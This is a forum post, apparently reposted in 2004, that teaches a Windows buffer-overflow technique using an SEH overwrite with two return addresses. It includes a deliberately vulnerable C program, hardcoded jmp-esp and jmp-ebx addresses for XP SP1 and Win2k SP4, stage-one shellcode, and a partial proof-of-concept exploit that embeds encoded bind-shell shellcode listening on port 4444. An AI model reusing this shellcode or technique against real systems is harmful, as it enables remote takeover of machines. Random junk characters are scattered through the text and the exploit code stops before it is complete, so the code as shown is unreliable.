The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well. " }3 {5 F6 r. E! i( `! }" j8 N5 Z y, C; H& P% @. M
[Buf] <- Shellcode ! U2 N4 I4 t. K* B[Return Address] <- jmp register (for Windows XP sp1)7 B" X5 g* d8 E) M* K
[Various Stack Data] <- Junk - m7 t6 l5 l% x) h+ C- `! _[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward ; w" ]0 L& z9 Z[SE Handler] <- jmp register (for Win2k sp4)6 T1 h/ y! m& |% W A' J- [6 e
[Stage1 Shellcode] <- stage1 shellcode for win2k 6 ?- f& P3 Q- F5 R* _% @0 }/ R q l R5 Z9 F) w. X6 [7 Y2 z9 X
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses1 o. j0 ?$ L& F+ n
2 P$ X/ ?1 @! ^3 m6 [6 gNecessary Tools: $ a/ `9 \' ^8 N+ a- OllyDBG! g6 s! t- B/ ~# |$ V- \
- C/C++ Compiler8 y& ^8 i1 }. G1 m
- nasm ' D+ n/ v9 H1 @3 o! q/ F4 X7 Q" k: r- Sac - o( w( ]2 K: @+ ^8 {- @5 S- G S$ D! J" z5 T% M# U% @8 f
Vulnerable Code:" J; k& |1 z2 f+ [4 @5 j. T
//lamebuf.c 6 }4 C# V0 U( _#include<stdio.h> 6 ^4 b d, a: Z1 ]- V1 P#include<string.h>" ]8 K& w- |& \
#include<windows.h> 1 E7 _" j- z4 x2 [' w' |( S. J& _int main(int argc,char *argv[]){. M( h. h5 |9 u8 r/ b6 n9 H5 P% F
) H) x& I7 |, P& r2 h& U& S( a
char buf[512]; - E- p; K6 J3 x. c. ?' ?char buf1[1024]; // <- simulate a stack' k, A2 B+ T9 U+ j. L8 f
//DebugBreak(); * D" e% Y3 _ @2 _7 _2 I, fif (argc != 2){ return -1; }% ~ h, H" {6 E0 s* b) i
. v5 M& ~' d; m
strcpy(buf,argv[1]);2 q# K% f) J* H) h5 Y( J, h2 J6 }
return 0x0;/ m8 I( b" t4 y' c- l
} 0 \; b @, E3 k3 }# _ / g( D7 }. N# B) w! J3 T9 vGetting Started: + e6 k, s5 f* H( a- P) O. LBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:' ]5 v K) K d( h
5 t9 l4 C2 a+ j; yEAX 00000000 $ g7 S7 l5 m6 j$ I# R1 \ECX 00321404 : L/ n& }, |, fEDX 00414141 - T# ]0 T) H1 Q% D) iEBX 7FFDF000- e0 b9 M3 ]) i, `, Q
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 8 w- s b' k% WEBP 41414141. [! }3 ^8 U: L/ U
ESI 77D4595F, F+ Z D: k, v |5 F
EDI 77F59037 ntdll.77F59037 6 J+ k/ D4 j& h* L; n4 `EIP 41414141 6 g& G# g" }$ h: P7 X6 W0 C. N& n) \# J
Lets take a look at the stack and see what happened to the default exception handler: 3 I4 j( r0 U4 n2 P; F0x0012FFB0 41414141 Pointer to next SEH Record# Q/ _" a5 s/ y" U
0x0012FFB4 41414141 SE Handler ; f& ~ X4 f/ M J5 Y2 ]* K8 ]8 B" }" V+ p5 Y0 Q
We successfully overwrote the return address and the default exception handler. ; G& a7 z& |7 F" Y5 Q* g 5 Z" U- b9 o7 u6 cPrimary Return Address (Windows XP SP1 EN): 2 L2 Q+ Z( k0 D p" WThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: 8 ~. R3 {' e3 H! Q! Y% \0 x"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"3 ^3 @- d" q: e1 z$ D6 r! ~
/ f4 K* D. e+ r" g0 `* y3 pSecondary Return Address (Windows 2000 SP4 EN):! c ?+ ]6 O1 P! |
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:- Y+ G- @, q$ o4 h
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"8 n8 D' D+ L, ]' X( k
6 V! A. p' ?4 G5 f) n/ aProof Of Concept: % y/ P( U, X+ \3 T4 ?$ j5 @% T# d// exploit.c * W" @- C% F- Z1 a: D// Tal zeltzer - [Double Return] //) X; ~' @, W6 Y
$ T: A/ A5 C4 [
#include<stdio.h>& `% b f# j# q& y; K1 ~( d/ H3 N
#include<string.h> ' s; {/ g! s" O* a; g( M0 k#include<windows.h> ) b7 z: f0 A; x' V/ Q% n5 X5 R& q3 G( I$ O
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp " Z% H4 B+ a3 Y5 Y#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx 5 w2 m' r: J8 _ h" z # y1 S8 O, k' B// Stage1 For WinXP Sp1 English 6 a& H; W% B: i# `unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; $ v3 g. C- |" h1 d7 H/ y9 ?! c7 x: _( X+ w
// Stage1 For Win2k Sp4 English 4 a7 N) x" y* Junsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";% q# z' _9 z5 N% K3 Q
. W! S' K5 ?2 _) D% Y( U$ S// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com - h- e: t& f5 w, N* x) J: Iunsigned char shellcode[] = , @" B/ `; `/ Z1 c. O; S4 T3 i"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"7 Y; v8 Z) j" A- z: n' D. h* w5 m
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"2 \# P( `$ R: z4 Y
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" 9 G; H2 p0 W6 @: \"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"$ F9 Y9 I3 O3 G% g, Z/ O5 {, F
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74") w, Z% i" U$ C% Z L
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"# x- I$ @2 L& J1 L- F6 k
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"8 V q& f9 Z7 S. Z* P6 V8 _1 l8 n
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"3 H O; E: J, y5 {9 }
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" % p( ^ ^* G- t$ w; D"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"! ?; R4 [2 F f/ n0 \3 f
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb" , f) ~$ l; D" n: h"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18". \" R, y* X% B# U
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6", P% W# w4 D3 O/ N& Y' L& g( k
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" 6 U [5 I0 U( z" V( _4 K"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" + I( s- a0 O9 G3 u. X. n"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"4 `. ~: f( v, M' l9 L9 D
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" . T9 @6 y/ F9 U6 O3 K1 e4 K2 V+ y"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" : G! w; a, d& v"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"1 s9 {" D7 p9 h. D7 ?" ~2 i9 Y9 C
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" 5 g7 {; @( r8 ?5 O0 T X"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" 1 ?0 U6 ~6 Q' _% P7 L% i' Q"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27") X' o: F& j5 n+ ^# j7 [. r# G
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" % ?( Z9 R; ^! s1 {, d"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" |' F/ ~" }/ ~$ N9 [
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";8 J+ J9 c7 n. U; ]" W8 M
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
